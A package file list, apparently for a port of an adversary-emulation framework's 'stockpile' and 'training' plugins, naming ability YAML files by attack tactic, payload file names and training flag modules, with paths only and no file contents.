+%%WWWDIR%%/plugins/stockpile/app/requirements/no_backwards_movement.py +%%WWWDIR%%/plugins/stockpile/app/requirements/not_exists.py +%%WWWDIR%%/plugins/stockpile/app/requirements/paw_provenance.py +%%WWWDIR%%/plugins/stockpile/app/requirements/reachable.py +%%WWWDIR%%/plugins/stockpile/app/requirements/req_like.py +%%WWWDIR%%/plugins/stockpile/app/stockpile_svc.py +%%WWWDIR%%/plugins/stockpile/conf/default.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/1f7ff232-ebf8-42bf-a3c4-657855794cfe.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/316251ed-6a28-4013-812b-ddf5b5b007f8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/55678719-e76e-4df9-92aa-10655bbd1cf4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/702bfdd2-9947-4eda-b551-c3a1ea9a59a2.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/94f21386-9547-43c4-99df-938ab05d45ce.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/cc191baa-7472-4386-a2f4-42f203f1acfd.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/collection/d69e8660-62c9-431e-87eb-8cf6bd4e35cf.yml 
+%%WWWDIR%%/plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/command-and-control/60f63260-39bb-4136-87a0-b6c2dca799fc.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/command-and-control/eb814e03-811a-467a-bc6d-dcd453750fa2.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/3aad5312-d48b-4206-9de4-39866c12e60f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/3c647015-ab0a-496a-8847-6ab173cd2b22.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/7049e3ec-b822-4fdf-a4ac-18190f9b66d1.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/98e58fc4-3843-4511-89b1-50cb872e0c9b.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/baac2c6d-4652-4b7e-ab0a-f1bf246edd12.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/c9f2c7ae-0092-4ea0-b9ae-92014eba7ce7.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/1258b063-27d6-489b-a677-4807faacf868.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/3864fd22-5c63-41c9-bdbc-a66b5ffa3f5e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/49470433-30ce-4714-a44b-bea9dbbeca9a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml 
+%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/7a6ba833-de40-466a-8969-5c37b13603e0.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/a398986f-31b0-436a-87e9-c8e82c028f3c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/a42dfc86-12f0-4f06-b0cf-24830c7f61f4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/a74bc239-a196-4f7e-8d5c-fe8c0266071c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/b007f6e8-4a87-4440-8888-29ceab047d9b.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/e5bcefee-262d-4568-a261-e8a20855ec81.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/e5f9de8f-3df1-4e78-ad92-a784e3f6770d.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/defense-evasion/fcf71ee3-d1a9-4136-b919-9e5f6da43608.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/0093c0e0-68b6-4cab-b0d4-2b40b3c78f71.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/0360ede1-3c28-48d3-a6ef-6e98f562c5af.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/05cda6f6-2b1b-462e-bff1-845af94343f7.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/0bff4ee7-42a4-4bde-b09a-9d79d8b9edd7.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/13379ae1-d20e-4162-91f8-320d78a35e7f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/14a21534-350f-4d83-9dd7-3c56b93a0c17.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/1c353eb4-29ab-4dfe-88ed-f34f5a60848e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/2488245e-bcbd-405d-920e-2de27db882b3.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/26c8b8b5-7b5b-4de1-a128-7d37fb14f517.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/29451844-9b76-4e16-a9ee-d6feab4b24db.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/2946edba-54d8-11eb-ae93-0242ac130002.yml 
+%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/2afae782-6d0a-4fbd-a6b6-d1ce90090eac.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/2dece965-37a0-4f70-a391-0f30e3331aba.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/364ea817-bbb9-4083-87dd-94b9dba45f6f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/46098c66-8d9a-4d23-8a95-dd5021c385ae.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/4d9b079c-9ede-4116-8b14-72ad3a5533af.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/530e47c6-8592-42bf-91df-c59ffbd8541b.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5a4cb2be-2684-4801-9355-3a90c91e0004.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5c65eec8-4839-4713-a4e1-86b2e75d1927.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5dc841fd-28ad-40e2-b10e-fb007fe09e81.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/6131397e-7765-424e-a594-3d7fb2d93a6a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml 
+%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/6d90e6fa-9324-4eb5-93be-9f737245bd7z.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/7c42a30c-c8c7-44c5-80a8-862d364ac1e4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/8adf02e8-6e71-4244-886c-98c402857404.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/8c06ebf8-bacf-486b-bd77-21ba8c5a5777.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/921055f4-5970-4707-909e-62f594234d91.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/9a30740d-3aa8-4c23-8efa-d51215e8a5b9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/9b007f62-daa1-44bd-a57d-00c5315ec6fe.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/a0676fe1-cd52-482e-8dde-349b73f9aa69.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/aaf34d82-aea9-4278-8ec4-789653e4f5d9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/ac9dce33-2acc-4b34-94ce-2596409ce8f0.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/b007fc38-9eb7-4320-92b3-9a3ad3e6ec25.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/b6b105b9-41dc-490b-bc5c-80d699b82ce8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml 
+%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c6607391-d02c-44b5-9b13-d3492ca58599.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c7ec57cd-933e-42b6-99a4-e852a9e57a33.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/c9be8043-a445-4cbf-b77b-ed7bb007fc7c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/deeac480-5c2a-42b5-90bb-41675ee53c7e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/f1cf4ea1-43f0-4604-9537-3d1b1b2d5b1c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/fa4ed735-7006-4451-a578-b516f80e559f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/fdf8bf36-797f-4157-805b-fe7c1c6fc903.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/discovery/feaced8f-f43f-452a-9500-a5219488abb8.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/134b49a3-3f93-41bd-85f4-563eadbb6055.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/315cedf1-4a3a-4015-b63f-149d64bacbbc.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/3796a00b-b11d-4731-b4ca-275a07d83299.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/95727b87-175c-4a69-8c7a-a5d82746a753.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml 
+%%WWWDIR%%/plugins/stockpile/data/abilities/execution/bfff9006-d1fb-46ce-b173-92cb04e9a031.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/ccdb8caf-c69e-424b-b930-551969450c57.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/de52784d-4de6-4d4e-b79e-e7b68fe037fb.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/dd4d3d6f-be0a-4d80-ada2-0b7f3228d2dc.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/0821b0b0-7902-4a7b-8052-80bda5a43684.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/2fe2d5e6-7b06-4fc0-bf71-6966a1226731.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/3b007f46-23e7-4a11-9c14-e7085b6a754a.yml 
+%%WWWDIR%%/plugins/stockpile/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/68235976-2404-42a8-9105-68230cfef562.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/impact/78524da1-f347-4fbb-9295-209f1f408330.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/3734aa1e-c536-42b3-8912-4c91b8bdce90.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/40161ad0-75bd-11e9-b475-0800200c9a66.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/620b674a-7655-436c-b645-bc3e8ea51abd.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/65048ec1-f7ca-49d3-9410-10813e472b30.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/lateral-movement/aa6ec4dd-db09-4925-b9b9-43adeb154686.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/665432a4-42e7-4ee1-af19-a9a8c9455d0c.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/95ad5d69-563e-477b-802b-4855bfb3be09.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/b7344901-0b02-4ead-baf6-e3f629ed545f.yml +%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml 
+%%WWWDIR%%/plugins/stockpile/data/abilities/privilege-escalation/e99cce5c-cb7e-4a6e-8a09-1609a221b90a.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/01c96671-afd3-47d4-8d31-8c116cc0221a.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/01d77744-2515-401a-a497-d9f7241aac3c.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/09ad625e-6cba-490f-afe3-5417e7edb9c6.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/0b73bf34-fc5b-48f7-9194-dce993b915b1.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/50855e29-3b4e-4562-aa55-b3d7f93c26b8.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/564ae20d-778d-4965-93dc-b523be2e2ab4.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/78e7504d-968f-477d-8806-4d6c04b94431.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/bcdbf6b9-14c5-495c-be84-37bce32c312b.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/c724545d-a4cc-492e-8075-2ab9a699c847.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/d6ea4c1e-7959-4eb1-a292-b6fd2b06c73e.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/dbd49a4a-ba2d-40d0-9348-2db24fc4b0b6.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/de07f52d-9928-4071-9142-cb1d3bd851e8.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/e4324b88-8836-4803-b6b7-09b3c6cd4e94.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/e89a10d3-004f-4c15-b0eb-d1ba76a4b67f.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/fbc41624-1052-490c-b5ec-4fd718e2501d.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/0b5636cf-f019-4ec9-aa7c-6e4f55505374.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/0f4c3c67-845e-49a0-927e-90ed33c044e0.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/1a98b8e6-18ce-4617-8cc5-e65a1a9d490e.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/4c28c132-d7d7-4a04-8908-d643b7cb1d58.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/5d3e170e-f1b8-49f9-9ee1-c51605552a08.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/725226e0-45b8-4432-84ee-144d3f37ff8d.yml 
+%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/ddbd1850-5fd7-41d5-a7a1-1b15dac49090.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/eddc8f03-f930-41e7-95ba-33fb87bfed74.yml +%%WWWDIR%%/plugins/stockpile/data/adversaries/packs/f98193a0-8b5b-4b5e-a5aa-e8c3adfcd4e6.yml +%%WWWDIR%%/plugins/stockpile/data/payloads/70632d81-bb39-40dd-bfba-cfd1f8196eb6.yml +%%WWWDIR%%/plugins/stockpile/data/planners/254c7035-de7d-4d76-a888-2c09ba594eca.yml +%%WWWDIR%%/plugins/stockpile/data/planners/5bdec528-07ce-44cc-8997-09fe41aa2007.yml +%%WWWDIR%%/plugins/stockpile/data/planners/788107d5-dc1e-4204-9269-38df0186d3e7.yml +%%WWWDIR%%/plugins/stockpile/data/planners/aaa7c857-37a0-4c4a-85f7-4e9f7f30e31a.yml +%%WWWDIR%%/plugins/stockpile/data/planners/f36c34f5-9439-4417-9640-fe83f4b7b12d.yml +%%WWWDIR%%/plugins/stockpile/data/sources/2ccb822c-088a-4664-8976-91be8879bc1d.yml +%%WWWDIR%%/plugins/stockpile/data/sources/4f3325d7-e6f2-4413-892a-60066052189d.yml +%%WWWDIR%%/plugins/stockpile/data/sources/ed32b9c3-9593-4c33-b0db-e2007315096b.yml +%%WWWDIR%%/plugins/stockpile/docs/Exfiltration-How-Tos.md +%%WWWDIR%%/plugins/stockpile/hook.py +%%WWWDIR%%/plugins/stockpile/payloads/Akagi64.exe +%%WWWDIR%%/plugins/stockpile/payloads/Bypass-UAC.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/Emulate-Administrator-Tasks.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/HostingCLRx64.dll +%%WWWDIR%%/plugins/stockpile/payloads/Invoke-MemeKatz.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/Invoke-ReflectivePEInjection.ps1.xored +%%WWWDIR%%/plugins/stockpile/payloads/basic_scanner.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/bookmark.scpt +%%WWWDIR%%/plugins/stockpile/payloads/debugger.dll +%%WWWDIR%%/plugins/stockpile/payloads/debugger.exe +%%WWWDIR%%/plugins/stockpile/payloads/file_search.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/file_search.sh +%%WWWDIR%%/plugins/stockpile/payloads/invoke-mimi.ps1.xored +%%WWWDIR%%/plugins/stockpile/payloads/minidump.exe +%%WWWDIR%%/plugins/stockpile/payloads/minidump.go 
+%%WWWDIR%%/plugins/stockpile/payloads/mission.go +%%WWWDIR%%/plugins/stockpile/payloads/powerview.ps1.xored +%%WWWDIR%%/plugins/stockpile/payloads/ragdoll.py +%%WWWDIR%%/plugins/stockpile/payloads/reflect.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/scanner.py +%%WWWDIR%%/plugins/stockpile/payloads/sshpass +%%WWWDIR%%/plugins/stockpile/payloads/totallylegit.exe +%%WWWDIR%%/plugins/stockpile/payloads/wifi.ps1 +%%WWWDIR%%/plugins/stockpile/payloads/wifi.sh +%%WWWDIR%%/plugins/stockpile/requirements.txt +%%WWWDIR%%/plugins/stockpile/templates/stockpile.html +%%WWWDIR%%/plugins/training/.eslintrc.js +%%WWWDIR%%/plugins/training/.flake8 +%%WWWDIR%%/plugins/training/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/training/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/training/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/training/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/training/.github/pull_request_template.md +%%WWWDIR%%/plugins/training/.github/workflows/javascript-lint.yml +%%WWWDIR%%/plugins/training/.gitignore +%%WWWDIR%%/plugins/training/README.md +%%WWWDIR%%/plugins/training/VERSION.txt +%%WWWDIR%%/plugins/training/__init__.py +%%WWWDIR%%/plugins/training/app/base_flag.py +%%WWWDIR%%/plugins/training/app/c_badge.py +%%WWWDIR%%/plugins/training/app/c_certification.py +%%WWWDIR%%/plugins/training/app/c_exam.py +%%WWWDIR%%/plugins/training/app/c_fillinblank.py +%%WWWDIR%%/plugins/training/app/c_flag.py +%%WWWDIR%%/plugins/training/app/c_multiplechoice.py +%%WWWDIR%%/plugins/training/app/c_navigator.py +%%WWWDIR%%/plugins/training/app/errors.py +%%WWWDIR%%/plugins/training/app/flags/advanced/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/advanced/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/advanced/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/adversaries/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/adversaries/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/adversaries/flag_2.py 
+%%WWWDIR%%/plugins/training/app/flags/agents/blue_0.py +%%WWWDIR%%/plugins/training/app/flags/agents/blue_1.py +%%WWWDIR%%/plugins/training/app/flags/agents/blue_2.py +%%WWWDIR%%/plugins/training/app/flags/agents/blue_3.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_3.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_4.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_5.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_6.py +%%WWWDIR%%/plugins/training/app/flags/agents/flag_7.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_0.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_1.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_2.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_3.py +%%WWWDIR%%/plugins/training/app/flags/attack/blue_4.py +%%WWWDIR%%/plugins/training/app/flags/autonomous/blue_0.py +%%WWWDIR%%/plugins/training/app/flags/autonomous/blue_1.py +%%WWWDIR%%/plugins/training/app/flags/autonomous/blue_2.py +%%WWWDIR%%/plugins/training/app/flags/autonomous/blue_3.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_0.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_1.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_2.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_3.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_4.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_5.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_6.py +%%WWWDIR%%/plugins/training/app/flags/developers/flag_7.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_0.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_1a.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_1b.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_2a.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_2b.py 
+%%WWWDIR%%/plugins/training/app/flags/manual/blue_2c.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_3a.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_3b.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4a_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4a_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4b_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4b_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4c_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_4c_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5a_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5a_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5b_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5b_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5c_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5c_win.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5d_nix.py +%%WWWDIR%%/plugins/training/app/flags/manual/blue_5d_win.py +%%WWWDIR%%/plugins/training/app/flags/operations/flag_0.py 